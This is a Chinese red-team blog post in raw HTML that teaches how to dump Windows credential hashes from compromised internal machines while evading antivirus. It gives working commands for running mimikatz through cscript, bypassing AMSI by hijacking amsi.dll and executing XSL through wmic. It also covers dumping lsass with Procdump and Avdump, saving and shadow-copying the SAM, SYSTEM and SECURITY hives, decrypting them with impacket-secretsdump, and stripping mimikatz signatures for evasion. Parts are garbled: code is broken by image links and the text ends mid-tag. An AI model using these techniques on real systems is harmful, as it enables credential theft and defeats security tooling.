抓取HASH的10001种方法
<div style="max-width:677px !important;"><section data-tools="135编辑器" data-id="92498" style="max-width: 100%;overflow-wrap: break-word !important;box-sizing: border-box !important;" data-mpa-powered-by="yiban.io"><section style="padding-top: 15px;padding-bottom: 15px;max-width: 100%;display: flex;justify-content: center;overflow-wrap: break-word !important;box-sizing: border-box !important;"><section style="max-width: 100%;background-image: url("https://www.ihonker.org/data/attachment/forum/202103/05/89f5af56e799c10ee61d1e082c00e3cd.png");background-position: left top;background-repeat: no-repeat;background-size: 30px;overflow-wrap: break-word !important;box-sizing: border-box !important;"><section style="padding: 8px 12px;max-width: 100%;background-image: url("https://www.ihonker.org/data/attachment/forum/202103/05/2649e7c5bc34795e724a673d153ee862.png");background-position: right bottom;background-size: 30px;background-repeat: no-repeat;overflow-wrap: break-word !important;box-sizing: border-box !important;"><section data-brushtype="text" style="padding-right: 20px;padding-left: 20px;max-width: 100%;line-height: 30px;font-size: 16px;background-color: rgb(88, 88, 88);color: rgb(88, 88, 88);overflow-wrap: break-word !important;box-sizing: border-box !important;"><p style="margin-right: 5px;margin-left: 5px;padding-right: 20px;padding-left: 20px;max-width: 100%;min-height: 1em;visibility: visible;line-height: 1.75em;letter-spacing: 2.5px;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;color: rgb(255, 255, 255);overflow-wrap: break-word !important;box-sizing: border-box !important;"><br></p></section></section></section></section></section><p style="max-width: 100%;min-height: 1em;overflow-wrap: break-word !important;box-sizing: border-box !important;"><br></p><section data-role="outer" label="Powered by 135editor.com"><section data-role="paragraph"><section data-tools="135编辑器" data-id="38806" data-color="#ef7060" style="font-size: 16px;"><section style="border-bottom: 4px solid rgb(221, 221, 221);margin-top: 10px;margin-bottom: 10px;text-align: left;"><section data-bcless="darken" style="border-bottom: 8px solid rgb(51, 51, 51);border-top-color: rgb(51, 51, 51);border-right-color: rgb(51, 51, 51);border-left-color: rgb(51, 51, 51);font-size: 14px;line-height: 20px;display: inline-block;margin-bottom: -5px;color: inherit;"><p style="border-color: #ddd;color: #ddd;font-size: 18px;line-height: 1.5em;background-color: #fefefe;"><span style="color: #333333;"><strong data-brushtype="text" style="border-color: #ddd;color: inherit;" hm_fix="181:294">前言</strong></span></p></section></section></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">在我们内网拿下机器时候,总会需要去抓取机器账户 HASH 值,但是往往大部分情况下机器存在杀软,有杀软的情况下服务器第一时间就干掉了最爱的 mimikatz。</span><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;"></span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width: 100%; cursor: pointer; opacity: 1;" src="https://www.ihonker.org/data/attachment/forum/202103/05/af37c0e5038d5f1afee7600f8654f811.png"></span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/2b9c21d5352f5c8025ef3c2214f2eb9a.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">我们需要更多的方法去抓取 HASH,常见的方法就不再详细举例了。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">Net4.0 执行读取</span></strong></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">下载 xml 文件</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">https://www.ihonker.org/data/attachment/forum/202103/05/4f0615c49af280507e5985676a2bfefd.png" data-type="png" data-w="829" style="width: 100%;height: auto;"/></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><br></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">JS 加载</span></strong><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">cscript mimikatz.js</span></code></pre></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">它已经能被一些敏感的 AV 识别,我们可以对其进行 bypass,通过 DLL 劫持绕过。发现在 ProcessMonitor 可以看到进程调用 C:\Windows\System32\amsi.dll</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/97092800c75d313ce53ce1108a737ff1.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">我们直接对其 DLL 劫持即可。</span><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">copy c:\windows\system32\cscript amsi.dll</span></code><code><span class="code-snippet_outer">asmi.dll <span class="code-snippet__number">11.</span>js</span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/0e745733ba96655f3b363ca516e9baad.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">如何生成 mimikatz 的 js 版本,可以参考看下面的介绍。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">https://www.ihonker.org/data/attachment/forum/202103/05/44f00d72ee46996aba3aaaa96ddbb9a8.png" data-type="png" data-w="1146" style="width: 100%;height: auto;"/></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">这里用 csc 生成了 base64 加密的版本,再用使用 javascript 启动内存中的 mimikatz。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">wmic 调用</span></strong><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">本地:wmic process list /FORMAT:evil.xsl</span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/1d42a9a5a3d6ad1fcd8340d82c6521ae.png"></span><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;letter-spacing: 2.5px;orphans: 4;white-space: pre-wrap;text-align: justify;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">远程:</span></code><code><span class="code-snippet_outer">wmic os get /FORMAT:<span class="code-snippet__string">"https://www.ihonker.org/data/attachment/forum/202103/05/271d4e4a726ded996f96c960619a24e4.png" data-type="png" data-w="894" style="width: 100%;height: auto;"/><p></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">Internal Monologue Attack</span></strong></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">https://www.ihonker.org/data/attachment/forum/202103/05/0f2058f006638d2b268dd087f75820ab.png" data-type="png" data-w="1280" style="width: 100%;height: auto;"/></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><br></p><section data-tools="135编辑器" data-id="38806" data-color="#ef7060" style="font-size: 16px;"><section style="border-bottom: 4px solid rgb(221, 221, 221);margin-top: 10px;margin-bottom: 10px;text-align: left;"><section data-bcless="darken" style="border-bottom: 8px solid rgb(51, 51, 51);border-top-color: rgb(51, 51, 51);border-right-color: rgb(51, 51, 51);border-left-color: rgb(51, 51, 51);font-size: 14px;line-height: 20px;display: inline-block;margin-bottom: -5px;color: inherit;"><p style="border-color: #ddd;color: #ddd;font-size: 18px;line-height: 1.5em;background-color: #fefefe;"><span style="color: #333333;"><strong data-brushtype="text" style="border-color: #ddd;color: inherit;" hm_fix="177:291">Bypass</strong></span></p></section></section></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">部分杀软很变态能够将这些杀死,我们可以用几个方法将其绕过,转储 LASS,读取系统文件,制作新的 Bypass</span><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">mimikazi 等等。</span><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">Procdump</span></strong></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/a3732dabde66c55abff599fedd214784.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">官方介绍:ProcDump 是一个命令行实用程序,其主要目的是监视应用程序中的 CPU 尖峰并在尖峰期间生成崩溃转储,管理员或开发人员可以使用它来确定尖峰原因。ProcDump 还包括挂起的窗口监视,未处理的异常监视,并且可以基于系统性能计数器的值生成转储。它也可以用作常规流程转储实用程序。</span><br></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">大家都熟知的 Procdump,由于它是微软官方的签名,所以我们能通过它 bypass 某些不怎么样的杀软来 dump 出 lass 存储的密码。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/31e72c34deb94428e073380face92bf7.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">执行如下命令</span><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">Procdump.exe -accepteula -ma lsass.exe lsass.dmp</span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width: 100%; cursor: pointer; opacity: 1;" src="https://www.ihonker.org/data/attachment/forum/202103/05/1a3605e94a893463b942d59eaff0f144.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">在本机的上面跑 mimikazi 进行密码的成功查看</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/46ea2ea035ba53382005a3f145237e77.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">Avdump</span></strong></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">Avdump.exe 是在 Avast HomeSecurity 产品套件一起提供的小工具。顾名思义,该实用程序将给定进程标识符的内存转储到用户指定的位置。我们可以通过它进行新的 dump 方式利用。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/95df0b2ac6a0bc05b55c26fcb9c54410.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">它自带 Avast 杀软公司白签名。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/639521b57a786b3de3ed32f4a32a3c31.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">我们直接运行即可。</span><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">.\AvDump.exe --pid <span class="code-snippet__number">696</span> --exception_ptr <span class="code-snippet__number">0</span> --dump_level <span class="code-snippet__number">1</span> --thread_id <span class="code-snippet__number">0</span>--min_interval <span class="code-snippet__number">0</span> --dump_file e:\tmp\last.dmp</span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/b7c3dd919da4c1bd67a24c605d93b127.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">在本机的上面跑 mimikazi 进行密码的成功查看。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/2f7deefcd8e9166c3b2c969c6b240059.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><br></p><section data-tools="135编辑器" data-id="38806" data-color="#ef7060" style="font-size: 16px;"><section style="border-bottom: 4px solid rgb(221, 221, 221);margin-top: 10px;margin-bottom: 10px;text-align: left;"><section data-bcless="darken" style="border-bottom: 8px solid rgb(51, 51, 51);border-top-color: rgb(51, 51, 51);border-right-color: rgb(51, 51, 51);border-left-color: rgb(51, 51, 51);font-size: 14px;line-height: 20px;display: inline-block;margin-bottom: -5px;color: inherit;"><p style="border-color: #ddd;color: #ddd;font-size: 18px;line-height: 1.5em;background-color: #fefefe;"><span style="color: #333333;"><strong data-brushtype="text" style="border-color: #ddd;color: inherit;" hm_fix="184:291">SAM 解密</strong></span></p></section></section></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">像一些变态的 EDR,会禁用 Procdump、Minidump 等⽅式转储 lsass 进程,我们可以换一种方法。</span><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">SAM 它是安全帐户管理器。⽤于存储⽤户和 hash,可以⽤来验证本地和远程⽤户。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">要解密 hash,我们需要获取到 SAM SYSTEM SECURITY 这三个⽂件。只要有这3个文件我们就能进行读取。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><br></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">注册表复值</span></strong></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">REG SAVE 将指定的子项、项和注册表值的副本保存到指定文件中,直接保存就完事了。</span><span style="color: rgb(88, 88, 88);font-family: 宋体, SimSun;font-size: 15px;"></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">reg save hklm\system SYSTEM</span></code><code><span class="code-snippet_outer">reg save hklm\sam SAM</span></code><code><span class="code-snippet_outer">reg save hklm\security SECURITY</span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/5487fee5fb61d552eecda70147cdc9d6.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">卷影复制</span></strong></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">通过拷⻉卷影副本卷中的⽂件来读取 3 个文件</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">先创建 c 盘的 shadowscopy</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="sql"><code><span class="code-snippet_outer">wmic shadowcopy <span class="code-snippet__keyword">call</span> <span class="code-snippet__keyword">create</span> volume=<span class="code-snippet__string">'c:\'</span></span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/f69829c1247e85ff51b6e3f1d982a2e8.png"></span><br></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">列出 shadows 的 list,从中并选择卷影副本卷,再复制我们需要的三个文件。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="objectivec"><code><span class="code-snippet_outer">vssadmin list shadows</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">copy</span>\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\sam.</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">copy</span>\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\security.</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">copy</span>\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\system.</span></code></pre></section><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/378a8bd4d6c7aec6b85f1af60c07ecb7.png"></span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/4ba8dd3fb99756c1b391b4cbf3dc5d51.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">解密恢复 HASH</span></strong></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">通过上面几种方法拿到 3 个文件后,我们用 impacket-secretsdump 来进行解密。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="perl"><code><span class="code-snippet_outer">impacket-secretsdump -sam SAM -security SECURITY -<span class="code-snippet__keyword">system</span> SYSTEM LOCAL</span></code></pre></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">用得到的 HASH 直接去解密即可。</span><br></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/2a209ef630a38e56cef328cadb71509f.png"></span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/98c91955a0e2c0ff4bf197288e2f8058.png"></span></p><p style="text-align: center;"><br></p><section data-tools="135编辑器" data-id="38806" data-color="#ef7060" style="font-size: 16px;"><section style="border-bottom: 4px solid rgb(221, 221, 221);margin-top: 10px;margin-bottom: 10px;text-align: left;"><section data-bcless="darken" style="border-bottom: 8px solid rgb(51, 51, 51);border-top-color: rgb(51, 51, 51);border-right-color: rgb(51, 51, 51);border-left-color: rgb(51, 51, 51);font-size: 14px;line-height: 20px;display: inline-block;margin-bottom: -5px;color: inherit;"><p style="border-color: #ddd;color: #ddd;font-size: 18px;line-height: 1.5em;background-color: #fefefe;"><span style="color: #333333;"><strong data-brushtype="text" style="border-color: #ddd;color: inherit;" hm_fix="164:292">mimikatz 免杀</strong></span></p></section></section></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">除此之外我们还可以对 MIMIKAZi 进行免杀的处理。</span><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">一般的方法是删除代码层 MIMIKATZ 特征,默认资源,如 ICO 图标,替换 bin 包内容。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">混淆编译完程序(加壳),克隆签名等等。</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">替换删除敏感词/修改图标 ico</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/d443f84778de85c93c80420625d335b1.png"></span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/d9440f3ac7dc468f33ccdcd5cac7cb04.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">修改 rc 特征。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/11c35c0a187a87843b2fc43fb99bd675.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">利用Hex找出一些敏感 DLL,函数如 wdigest.dll,isbase64interceptinput 等等进行替换</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/0e06e10c8b01e43fa8b52811f3771eb1.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">替换敏感的 bin 文件中方法指定成系统自带的 dll 方法</span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">netapi32</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/3854a0aed77401a33c5bdbe12010a3a6.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">系统中 netapi32.dll 文件</span></p><p style="text-align: center;"><span><img 